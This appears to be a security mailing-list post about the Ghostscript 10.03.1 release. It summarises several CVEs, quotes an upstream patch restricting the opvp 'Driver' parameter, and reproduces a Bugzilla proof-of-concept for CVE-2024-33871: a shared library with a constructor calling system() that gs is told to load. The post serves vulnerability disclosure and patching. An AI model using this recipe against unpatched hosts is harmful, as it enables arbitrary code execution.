
Ghostscript 10.03.1 (2024-05-02) release notes:


mentions this:

> - Fixes for CVE-2024-33869, CVE-2023-52722, CVE-2024-33870,
> CVE-2024-33871 and CVE-2024-29510

> - A vulnerability was identified in the way Ghostscript/GhostPDL called
> tesseract for the OCR devices, which could allow arbitrary code
> execution. As as result, we strongly urge anyone including the OCR
> devices in their build to update as soon as possible.

Out of these, CVE-2024-33871 is probably the worst (CVSS 8.8 and
Important per Red Hat):


> A flaw was found in Ghostscript. The "Driver" parameter for the
> "opvp"/"oprp" device specifies the name of a dynamic library and allows
> any library to be loaded. This flaw allows a malicious user to send a
> specially crafted document that, when processed by Ghostscript, could
> potentially lead to arbitrary code execution with the privileges of the
> Ghostscript process on the system.

(recently patched in RHEL 8 and 9, and thus in the RHEL rebuild distros)

There's a patch and a reproducer for it in upstream Bugzilla:


> zhutyra 2024-04-21 15:27:29 UTC
> Created attachment 25611 [details]
> patch

+++ a/contrib/opvp/gdevopvp.c
@@ -3456,6 +3456,12 @@ _put_params(gx_device *dev, gs_param_list *plist)
     code = param_read_string(plist, pname, &vdps);
     switch (code) {
     case 0:
+        if (gs_is_path_control_active(dev->memory)
+            && (!opdev->globals.vectorDriver || 
strlen(opdev->globals.vectorDriver) != vdps.size
+                || memcmp(opdev->globals.vectorDriver, vdps.data, vdps.size) 
!= 0)) {
+            param_signal_error(plist, pname, gs_error_invalidaccess);
+            return_error(gs_error_invalidaccess);
+        }
         buff = realloc(buff, vdps.size + 1);
         memcpy(buff, vdps.data, vdps.size);
         buff[vdps.size] = 0;

> The "Driver" parameter for the "opvp"/"oprp" device specifies the name of a 
> dynamic library and allows any library to be loaded.
> The patch does not allow changing this parameter after activating path 
> control.
> Comment 1 zhutyra 2024-04-21 15:29:14 UTC
> Created attachment 25612 [details]
> exploit
> Exploit for x86_64 Linux.
> ```
> $ gs -q -dNODISPLAY opvplib.ps
> uid=1000(user) gid=1000(user) groups=1000(user)
> ```
> The file contains a precompiled library. If it doesn't work for you or you 
> don't want to run unknown code, you can also do it manually.
> ```
> $ cat >lib.c <<"EOF"
> #include <stdlib.h>
> static void __attribute__ ((constructor)) init(void) {
>     exit(system("id"));
> }
> $ gcc -fPIC -shared -o /tmp/lib.so lib.c
> $ gs -q -dNODISPLAY -c '<< /OutputDevice /opvp /Driver (/tmp/lib.so) >> 
> setpagedevice'
> uid=1000(user) gid=1000(user) groups=1000(user)

The second attachment (exploit) gives me "Sorry, you are not authorized
to access attachment #25612." but apparently it's just a precompiled
version of what's included in the comment body, above, so not required
to exploit the issue.  A colleague has tested the above exploit on
latest CentOS 7 and it just worked (now patched in CIQ's CentOS Bridge).

CVE-2024-33870 is also pretty bad:


> A flaw was found in Ghostscript. When the gp_validate_path_len function
> validates a path, it distinguishes between absolute and relative paths.
> In the case of relative paths, it will check the path with and without
> the current-directory-prefix ("foo" and "./foo"). This does not take
> into account paths with a parent-directory-prefix. Therefore, a path
> like "../../foo" is also tested as "./../../foo" and if the current
> directory "./" is in the permitted paths, it will pass the check, which
> may allow arbitrary file access.

The remaining 3 CVEs are also serious, although they have lower scores.

The CVE records for all four 2024 CVEs above still merely say "reserved
by a CNA", without descriptions.  The 2023 CVE has proper info in it.


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